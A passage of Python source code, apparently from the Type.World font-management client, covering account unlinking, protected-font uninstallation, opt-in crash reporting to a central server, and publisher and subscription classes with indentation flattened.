return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def reactivateAppInstance(self, anonymousAppID=None):
try:
if not self.user():
return False, "No user"
parameters = {
"anonymousAppID": anonymousAppID or self.anonymousAppID(),
"anonymousUserID": self.user(),
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/reactivateAppInstance", parameters
)
if not success:
return False, response
response = json.loads(response)
if response["response"] != "success":
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def unlinkUser(self):
try:
self.appendCommands("unlinkUser")
return self.performCommands()
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def uninstallAllProtectedFonts(self, dryRun=False):
try:
# Uninstall all protected fonts
for publisher in self.publishers():
for subscription in publisher.subscriptions():
(
success,
installabeFontsCommand,
) = subscription.protocol.installableFontsCommand()
assert success
fontIDs = []
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
# Dry run from central server: add all fonts to list
if dryRun and font.protected:
fontIDs.append(font.uniqueID) # nocoverage (This is executed only when the
# central server uninstalls *all* fonts)
# Run from local client, add only actually installed
# fonts
elif not dryRun and font.protected and subscription.installedFontVersion(font=font):
fontIDs.append(font.uniqueID)
if fontIDs:
success, message = subscription.removeFonts(fontIDs, dryRun=dryRun, updateSubscription=False)
if not success:
return False, message
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def performUnlinkUser(self):
try:
userID = self.user()
success, response = self.uninstallAllProtectedFonts()
if not success:
return False, response
parameters = {
"anonymousAppID": self.anonymousAppID(),
"anonymousUserID": userID,
"secretKey": self.secretKey(),
}
success, response, responseObject = self.performRequest(
self.mothership + "/unlinkTypeWorldUserAccount", parameters
)
if not success:
return False, response
response = json.loads(response)
continueFor = ["userUnknown"]
if response["response"] != "success" and not response["response"] in continueFor:
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
self.set("typeworldUserAccount", "")
self.set("userAccountEmailIsVerified", "")
self.remove("acceptedInvitations")
self.remove("pendingInvitations")
self.remove("sentInvitations")
# ZMQ
topicID = "user-%s" % userID
self.unregisterZMQCallback(topicID)
keyring = self.keyring()
keyring.delete_password(self.userKeychainKey(userID), "secretKey")
keyring.delete_password(self.userKeychainKey(userID), "userEmail")
keyring.delete_password(self.userKeychainKey(userID), "userName")
# Success
return True, None
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def systemLocale(self):
try:
if not self._systemLocale:
if MAC:
from AppKit import NSLocale
self._systemLocale = str(NSLocale.preferredLanguages()[0].split("_")[0].split("-")[0])
else:
import locale
self._systemLocale = locale.getdefaultlocale()[0].split("_")[0]
return self._systemLocale
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def locale(self):
try:
"""\
Reads user locale from OS
"""
if self.get("localizationType") == "systemLocale":
_locale = [self.systemLocale()]
elif self.get("localizationType") == "customLocale":
_locale = [self.get("customLocaleChoice") or "en"]
else:
_locale = [self.systemLocale()]
if "en" not in _locale:
_locale.append("en")
return _locale
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def expiringInstalledFonts(self):
try:
fonts = []
for publisher in self.publishers():
for subscription in publisher.subscriptions():
fonts.extend(subscription.expiringInstalledFonts())
return fonts
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountOutdatedFonts(self):
try:
amount = 0
for publisher in self.publishers():
amount += publisher.amountOutdatedFonts()
return amount
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def keyring(self):
try:
# Using keyring causes problems on all three MAC/WIN/LINUX
# when used headlessly in a CI environment,
# so we’re using the dummy for CI, which sucks because
# then you can’t self-test thoroughly it during app build
if (CI and not self.inCompiledApp) or GAE:
keyring = dummyKeyRing
return keyring
import keyring # nocoverage
if MAC: # nocoverage
if self.inCompiledApp:
keyring.core.set_keyring(keyring.core.load_keyring("keyring.backends.macOS.Keyring")) # nocoverage
elif WIN: # nocoverage
keyring.core.set_keyring(
keyring.core.load_keyring("keyring.backends.Windows.WinVaultKeyring")
) # nocoverage
elif LINUX: # nocoverage
keyring.core.set_keyring(
keyring.core.load_keyring("keyring.backends.kwallet.DBusKeyring")
) # nocoverage
return keyring # nocoverage
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def handleTraceback(self, file=None, sourceMethod=None, e=None):
# Needs explicit permission, to be handled by UI
if self.get("sendCrashReports") or self.testing:
payload = f"""\
Version: {typeworld.api.VERSION}
{traceback.format_exc()}
"""
# Remove path parts to make tracebacks identical (so they don't re-surface)
def removePathPrefix(_payload, _snippet, _file):
m = re.search(r'File "(.+?)"', _payload, re.MULTILINE)
if m:
_file = m.group(1)
index = _file.find(_snippet)
if index != -1:
clientPathPrefix = _file[:index]
return _payload.replace(clientPathPrefix, "")
else:
return _payload
else:
return _payload # nocoverage (this seems to never get executed,
# because code always contains `File "..."` like it should.
# Leaving this here just in case) TODO
# Normalize file paths
if WIN:
payload = (
removePathPrefix(payload, "TypeWorld.exe", __file__)
.replace("\\", "/")
.replace("TypeWorld.exe", "app.py")
)
payload = removePathPrefix(payload, "typeworld/client/", __file__).replace("\\", "/")
payload = removePathPrefix(payload, "app.py", file).replace("\\", "/")
# Create supplementary information
supplementary = {
"os": OSName(),
"file": file or __file__,
"preferences": self._preferences.dictionary(),
}
if sourceMethod:
if hasattr(sourceMethod, "__self__") and sourceMethod.__self__:
supplementary["sourceMethodSignature"] = (
str(sourceMethod.__self__.__class__.__name__)
+ "."
+ str(sourceMethod.__name__)
+ str(inspect.signature(sourceMethod))
)
else:
supplementary["sourceMethodSignature"] = str( # nocoverage
sourceMethod.__name__ # nocoverage
) + str( # nocoverage
inspect.signature(sourceMethod) # nocoverage
) # nocoverage
# (currently not testing for calling this method without
# a sourceMethod parameter)
supplementary["traceback"] = payload
supplementary["stack"] = []
supplementary["trace"] = []
for s in inspect.stack():
supplementary["stack"].append(
{
"filename": str(s.filename),
"lineno": str(s.lineno),
"function": str(s.function),
"code_context": str(s.code_context[0].replace("\t", " ").rstrip()) if s.code_context else None,
}
)
for s in inspect.trace():
supplementary["trace"].append(
{
"filename": str(s.filename),
"lineno": str(s.lineno),
"function": str(s.function),
"code_context": str(s.code_context[0].replace("\t", " ").rstrip()) if s.code_context else None,
}
)
# replace faulty line of code (some Python versions include the faulty code
# line in the traceback output, some not)
if supplementary["trace"] and supplementary["trace"][0]["code_context"]:
payload = payload.replace(supplementary["trace"][0]["code_context"], "")
payload = payload.replace("\n \n", "\n")
parameters = {
"payload": payload,
"supplementary": json.dumps(supplementary),
}
# Submit to central server
# if self.online(self.mothership):
def handleTracebackWorker(self):
success, response, responseObject = self.performRequest(
self.mothership + "/handleTraceback", parameters
)
if success:
response = json.loads(response)
if response["response"] != "success":
self.log("handleTraceback() error on server, step 2: %s" % response)
if not success:
self.log("handleTraceback() error on server, step 1: %s" % response)
handleTracebackThread = threading.Thread(target=handleTracebackWorker, args=(self,))
handleTracebackThread.start()
# Log
if sourceMethod:
self.log(payload + "\nMethod signature:\n" + supplementary["sourceMethodSignature"])
else:
self.log(payload) # nocoverage # nocoverage # nocoverage
# (currently not testing for calling this method without a sourceMethod
# parameter)
return False, payload
def log(self, *arg):
string = "Type.World: %s" % " ".join(map(str, arg))
if MAC:
nslog(string)
else:
logging.debug(string)
def prepareUpdate(self):
self._subscriptionsUpdated = []
def allSubscriptionsUpdated(self):
try:
for publisher in self.publishers():
for subscription in publisher.subscriptions():
if subscription.stillUpdating():
return False
return True
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def deleteResources(self, urls):
# try:
# resources = self.get("resources") or {}
# for url in urls:
# for key in resources.keys():
# if key.startswith(url):
# del resources[key]
# break
# self.set("resources", resources)
# except Exception as e: # nocoverage
# return self.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
# content will be stored and return as a bas64-encoded string"""
# try:
# resources = self.get("resources") or {}
# key = f"{url},binary={binary}"
# # Load fresh
# if key not in resources or update:
# if self.testScenario:
# url = addAttributeToURL(url, "testScenario=%s" % self.testScenario)
# success, response, responseObject = request(url, method="GET")
# if not success:
# return False, response, responseObject.headers["content-type"]
# content = responseObject.content
# if binary:
# content = base64.b64encode(content).decode()
# else:
# content = content.decode()
# resources[key] = responseObject.headers["content-type"] + "," + content
# self.set("resources", resources)
# return True, content, responseObject.headers["content-type"]
# # Serve from cache
# else:
# response = resources[key]
# mimeType = response.split(",")[0]
# content = response[len(mimeType) + 1 :]
# return True, content, mimeType
# except Exception as e: # nocoverage
# return self.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def anonymousAppID(self):
try:
anonymousAppID = self.get("anonymousAppID")
if anonymousAppID is None or anonymousAppID == {}:
import uuid
anonymousAppID = str(uuid.uuid1())
self.set("anonymousAppID", anonymousAppID)
return anonymousAppID
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def endpointCommand(self, url):
try:
# Check for URL validity
success, response = urlIsValid(url)
if not success:
return False, response
# Get subscription
success, protocol = getProtocol(url)
protocol.client = self
# Get Root Command
return protocol.endpointCommand(testScenario=self.testScenario)
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def reportAPIEndpointError(self, url):
reportThread = threading.Thread(target=self.reportAPIEndpointErrorWorker, args=(url,))
reportThread.start()
def reportAPIEndpointErrorWorker(self, url):
success, content, response = self.performRequest(
self.mothership + "/reportAPIEndpointError", {"subscriptionURL": url}
)
def addSubscription(
self,
url,
username=None,
password=None,
remotely=False,
JSON=None,
reportErrors=True,
):
try:
self._updatingProblem = None
# Check for URL validity
success, response = urlIsValid(url)
if not success:
return False, response, None, None
# Get subscription
success, message = getProtocol(url)
if success:
protocol = message
protocol.client = self
else:
return False, message, None, None
# Change secret key
if protocol.unsecretURL() in self.unsecretSubscriptionURLs():
# Initial endpointCommand
success, message = self.endpointCommand(url)
if success:
endpointCommand = message
else:
if reportErrors:
self.reportAPIEndpointError(url)
return False, message, None, None
protocol.setSecretKey(protocol.url.secretKey)
publisher = self.publisher(endpointCommand.canonicalURL)
subscription = publisher.subscription(protocol.unsecretURL(), protocol)
else:
# Initial Health Check
success, response = protocol.aboutToAddSubscription(
anonymousAppID=self.anonymousAppID(),
anonymousTypeWorldUserID=self.user(),
accessToken=protocol.url.accessToken,
testScenario=self.testScenario,
)
if not success:
message = response
# self._updatingProblem = [
# "#(response.loginRequired)",
# "#(response.loginRequired.headline)",
# ]
if reportErrors:
self.reportAPIEndpointError(url)
return False, message, None, None
# endpointCommand
success, endpointCommand = protocol.endpointCommand(testScenario=self.testScenario)
assert success
assert endpointCommand
# Breaking API Version Check
if "breakingAPIVersions" in self.get("downloadedSettings"):
breakingVersions = copy.copy(self.get("downloadedSettings")["breakingAPIVersions"])
if self.testScenario == "simulateBreakingAPIVersion":
versionParts = breakingVersions[-1].split(".")
versionParts[0] = str(int(versionParts[0]) + 1)
breakingVersions.append(".".join(versionParts))
success, rootCommand = protocol.rootCommand(testScenario=self.testScenario)
assert success
assert rootCommand
incomingVersion = rootCommand.version
for breakingVersion in breakingVersions:
# Breaking version is higher than local API version
if (
semver.VersionInfo.parse(breakingVersion).compare(typeworld.api.VERSION)
== 1
# Incoming version is higher than breaking
) and (semver.VersionInfo.parse(incomingVersion).compare(breakingVersion) == 1):
if reportErrors:
self.reportAPIEndpointError(url)
return (
False,
[
"#(response.appUpdateRequired)",
"#(response.appUpdateRequired.headline)",
],
None,
None,
)
# Commercial app check
if self.commercial and self.appID not in endpointCommand.allowedCommercialApps:
if reportErrors:
self.reportAPIEndpointError(url)
return (
False,
[
"#(response.commercialAppNotAllowed)",
"#(response.commercialAppNotAllowed.headline)",
],
None,
None,
)
publisher = self.publisher(endpointCommand.canonicalURL)
subscription = publisher.subscription(protocol.unsecretURL(), protocol)
# Success
subscription.save()
publisher.save()
subscription.stillAlive()
self.manageMessageQueueConnection()
self.delegate._subscriptionHasBeenAdded(subscription, remotely)
if not remotely and not self.externallyControlled:
success, message = self.uploadSubscriptions()
if not success:
return (
False,
message,
None,
None,
) # 'Response from client.uploadSubscriptions(): %s' %
return True, None, publisher, subscription
except Exception as e: # nocoverage
self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
return False, traceback.format_exc(), None, None
def publisher(self, canonicalURL):
try:
if canonicalURL not in self._publishers:
e = APIPublisher(self, canonicalURL)
self._publishers[canonicalURL] = e
if self.get("publishers") and canonicalURL in self.get("publishers"):
self._publishers[canonicalURL].exists = True
return self._publishers[canonicalURL]
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def publishers(self):
try:
if self.get("publishers"):
publishers = []
if self.get("publishers"):
for canonicalURL in self.get("publishers"):
publisher = self.publisher(canonicalURL)
if publisher.subscriptions():
publishers.append(publisher)
return publishers
else:
return []
except Exception as e: # nocoverage
return self.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def files(self):
"Returns list of all resource URLs"
files = []
for publisher in self.publishers():
files = set(files) | set(publisher.files())
return list(set(files))
class APIPublisher(object):
"""\
Represents an API endpoint, identified and grouped by the canonical URL attribute
of the API responses. This API endpoint class can then hold several repositories.
"""
def __init__(self, parent, canonicalURL):
self.parent = parent
self.canonicalURL = canonicalURL
self.exists = False
self._subscriptions = {}
self._updatingSubscriptions = []
def folder(self):
try:
if WIN:
return os.path.join(os.environ["WINDIR"], "Fonts")
elif MAC:
from os.path import expanduser
home = expanduser("~")
folder = os.path.join(home, "Library", "Fonts", "Type.World App")
return folder
else:
import tempfile
return tempfile.gettempdir()
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def stillUpdating(self):
try:
return len(self._updatingSubscriptions) > 0
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def updatingProblem(self):
try:
problems = []
for subscription in self.subscriptions():
problem = subscription.updatingProblem()
if problem and problem not in problems:
problems.append(problem)
if problems:
return problems
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def name(self, locale=["en"]):
try:
endpointCommand = self.subscriptions()[0].protocol.endpointCommand()[1]
if endpointCommand:
return endpointCommand.name.getTextAndLocale(locale=locale)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountInstalledFonts(self):
try:
return len(self.installedFonts())
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def installedFonts(self):
try:
_list = []
for subscription in self.subscriptions():
for font in subscription.installedFonts():
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountOutdatedFonts(self):
try:
return len(self.outdatedFonts())
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def outdatedFonts(self):
try:
_list = []
for subscription in self.subscriptions():
for font in subscription.outdatedFonts():
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def currentSubscription(self):
# if self.get('currentSubscription'):
# subscription = self.subscription(self.get('currentSubscription'))
# if subscription:
# return subscription
def get(self, key):
try:
preferences = self.parent.get("publisher(%s)" % self.canonicalURL) or {}
if key in preferences:
o = preferences[key]
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
return o
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def set(self, key, value):
try:
preferences = self.parent.get("publisher(%s)" % self.canonicalURL) or {}
preferences[key] = value
self.parent.set("publisher(%s)" % self.canonicalURL, preferences)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def addGitHubSubscription(self, url, commits):
# self.parent._subscriptions = {}
# subscription = self.subscription(url)
# subscription.set('commits', commits)
# self.set('currentSubscription', url)
# subscription.save()
# return True, None
def subscription(self, url, protocol=None):
try:
if url not in self._subscriptions:
# Load from DB
loadFromDB = False
if not protocol:
success, message = getProtocol(url)
if success:
protocol = message
loadFromDB = True
e = APISubscription(self, protocol)
if loadFromDB:
protocol.loadFromDB()
self._subscriptions[url] = e
if self.get("subscriptions") and url in self.get("subscriptions"):
self._subscriptions[url].exists = True
return self._subscriptions[url]
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def subscriptions(self):
try:
subscriptions = []
if self.get("subscriptions"):
for url in self.get("subscriptions"):
if urlIsValid(url)[0] is True:
subscriptions.append(self.subscription(url))
return subscriptions
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def update(self):
try:
self.parent.prepareUpdate()
changes = False
if self.parent.online():
for subscription in self.subscriptions():
success, message, change = subscription.update()
if change:
changes = True
if not success:
return success, message, changes
return True, None, changes
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
False,
)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def save(self):
try:
publishers = self.parent.get("publishers") or []
if self.canonicalURL not in publishers:
publishers.append(self.canonicalURL)
self.parent.set("publishers", publishers)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
# content will be stored and return as a bas64-encoded string"""
# try:
# success, response, mimeType = self.parent.resourceByURL(url, binary, update)
# # Save resource
# if success is True:
# resourcesList = self.get("resources") or []
# if url not in resourcesList:
# resourcesList.append(url)
# self.set("resources", resourcesList)
# return success, response, mimeType
# except Exception as e: # nocoverage
# self.parent.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def delete(self, calledFromSubscription=False):
try:
if not calledFromSubscription:
for subscription in self.subscriptions():
success, message = subscription.delete(calledFromParent=True, remotely=False)
if not success:
return False, message
# Resources
self.parent.delegate._publisherWillDelete(self)
self.parent.remove("publisher(%s)" % self.canonicalURL)
publishers = self.parent.get("publishers")
publishers.remove(self.canonicalURL)
self.parent.set("publishers", publishers)
# self.parent.set('currentPublisher', '')
# Sync to server
if not calledFromSubscription:
self.parent.uploadSubscriptions()
self.parent.delegate._publisherHasBeenDeleted(self)
self.parent.manageMessageQueueConnection()
self.parent._publishers = {}
return True, None
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def files(self):
"Returns list of all resource URLs that the publisher may have loaded"
files = []
for subscription in self.subscriptions():
files = set(files) | set(subscription.files())
return list(set(files))
class APISubscription(object):
"""\
Represents a subscription, identified and grouped by the canonical URL attribute of
the API responses.
"""
def __init__(self, parent, protocol):
try:
self.parent = parent
self.exists = False
self.secretKey = None
self.protocol = protocol
self.protocol.subscription = self
self.protocol.client = self.parent.parent
self.url = self.protocol.unsecretURL()
self.stillAliveTouched = None
self._updatingProblem = None
# ZMQ
if self.parent.parent._isSetOnline and self.parent.parent.zmqSubscriptions:
self.parent.parent.zmqSetup()
self.parent.parent.registerZMQCallback(self.zmqTopic(), self.zmqCallback)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def zmqTopic(self):
return "subscription-%s" % urllib.parse.quote_plus(self.protocol.shortUnsecretURL())
def __repr__(self):
return f'<APISubscription url="{self.url}">'
def uniqueID(self):
try:
uniqueID = self.get("uniqueID")
if uniqueID is None or uniqueID == {}:
# import uuid
uniqueID = Garbage(10)
self.set("uniqueID", uniqueID)
return uniqueID
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def zmqCallback(self, message):
try:
if message:
data = json.loads(message)
if (
data["command"] == "pullUpdates"
and "sourceAnonymousAppID" not in data
or (
"sourceAnonymousAppID" in data
and data["sourceAnonymousAppID"] != self.parent.parent.anonymousAppID()
)
):
delegate = self.parent.parent.delegate
delegate._subscriptionUpdateNotificationHasBeenReceived(self)
success, message, changes = self.update()
if success:
if "serverTimestamp" in data and data["serverTimestamp"]:
self.set("serverTimestamp", data["serverTimestamp"])
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# TODO: Temporarily suspended because the central API updateSubscription requires
# an APIKey parameter, so is intended only for publishers atm.
# Here, this should be called after a protected font has been installed,
# as it should update the used seats for that font
# def announceChange(self):
# try:
# if not self.parent.parent.user(): return False, 'No user'
# self.set('lastServerSync', int(time.time()))
# parameters = {
# 'command': 'updateSubscription',
# 'anonymousAppID': self.parent.parent.anonymousAppID(),
# 'anonymousUserID': self.parent.parent.user(),
# 'subscriptionURL': self.protocol.url.secretURL(),
# 'secretKey': self.parent.parent.secretKey(),
# }
# success, response, responseObject =
# self.parent.parent.performRequest(self.parent.parent.
# mothership, parameters)
# if not success:
# return False, response
# response = json.loads(response)
# if response['response'] != 'success':
# return False, ['#(response.%s)' % response['response'], '#(response.%s.
# headline)' % response['response']]
# # Success
# return True, None
# except Exception as e: self.parent.parent.handleTraceback(sourceMethod =
# getattr(self, sys._getframe().f_code.co_name), e = e)
def hasProtectedFonts(self):
try:
success, installabeFontsCommand = self.protocol.installableFontsCommand()
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if font.protected:
return True
return False
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def stillAlive(self):
try:
def stillAliveWorker(self):
# Register endpoint
parameters = {
"url": "typeworld://%s+%s"
% (
self.protocol.url.protocol,
self.parent.canonicalURL.replace("://", "//"),
),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/registerAPIEndpoint", parameters
)
if not success:
return False, response
response = json.loads(response)
# Touch only once
if not self.parent.parent.user():
if not self.stillAliveTouched:
stillAliveThread = threading.Thread(target=stillAliveWorker, args=(self,))
stillAliveThread.start()
self.stillAliveTouched = time.time()
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def inviteUser(self, targetEmail):
# print("inviteUser()")
try:
if self.parent.parent.online():
if not self.parent.parent.userEmail():
return False, "No source user linked."
parameters = {
"targetUserEmail": targetEmail,
"sourceUserEmail": self.parent.parent.userEmail(),
"subscriptionURL": self.protocol.secretURL(),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/inviteUserToSubscription",
parameters,
)
if not success:
return False, response
response = json.loads(response)
# print(response)
if response["response"] == "success":
return True, None
else:
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def revokeUser(self, targetEmail):
try:
if self.parent.parent.online():
parameters = {
"targetUserEmail": targetEmail,
"sourceUserEmail": self.parent.parent.userEmail(),
"subscriptionURL": self.protocol.secretURL(),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/revokeSubscriptionInvitation",
parameters,
)
if not success:
return False, response
response = json.loads(response)
if response["response"] == "success":
return True, None
else:
return False, response["response"]
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def invitationAccepted(self):
try:
if self.parent.parent.user():
acceptedInvitations = self.parent.parent.acceptedInvitations()
if acceptedInvitations:
for invitation in acceptedInvitations:
if self.protocol.unsecretURL() == invitation.url:
return True
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def invitationSent(self):
try:
if self.parent.parent.user():
sentInvitations = self.parent.parent.sentInvitations()
if sentInvitations:
for invitation in sentInvitations:
if self.protocol.unsecretURL() == invitation.url:
return True
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def stillUpdating(self):
try:
return self.url in self.parent._updatingSubscriptions
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def name(self, locale=["en"]):
try:
success, installabeFontsCommand = self.protocol.installableFontsCommand()
return installabeFontsCommand.name.getText(locale) or "#(Unnamed)"
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
# content will be stored and return as a bas64-encoded string"""
# try:
# success, response, mimeType = self.parent.parent.resourceByURL(
# url, binary, update
# )
# # Save resource
# if success is True:
# resourcesList = self.get("resources") or []
# if url not in resourcesList:
# resourcesList.append(url)
# self.set("resources", resourcesList)
# return success, response, mimeType
# except Exception as e: # nocoverage
# self.parent.parent.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def familyByID(self, ID):
try:
success, installabeFontsCommand = self.protocol.installableFontsCommand()
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
if family.uniqueID == ID:
return family
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def fontByID(self, ID):
try:
success, installabeFontsCommand = self.protocol.installableFontsCommand()
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if font.uniqueID == ID:
return font
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def amountInstalledFonts(self):
try:
return len(self.installedFonts())
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def installedFonts(self):
try:
_list = []
# Get font
success, installabeFontsCommand = self.protocol.installableFontsCommand()
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if self.installedFontVersion(font=font):
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def expiringInstalledFonts(self):
try:
fonts = []
# Get font
success, installabeFontsCommand = self.protocol.installableFontsCommand()
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if self.installedFontVersion(font=font) and font.expiry:
if font not in fonts:
fonts.append(font)
return fonts
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def amountOutdatedFonts(self):
try:
return len(self.outdatedFonts())
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def outdatedFonts(self):
try:
_list = []
success, installabeFontsCommand = self.protocol.installableFontsCommand()
# Get font
for foundry in installabeFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion and installedFontVersion != font.getVersions()[-1].number:
if font not in _list:
_list.append(font.uniqueID)
return _list
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
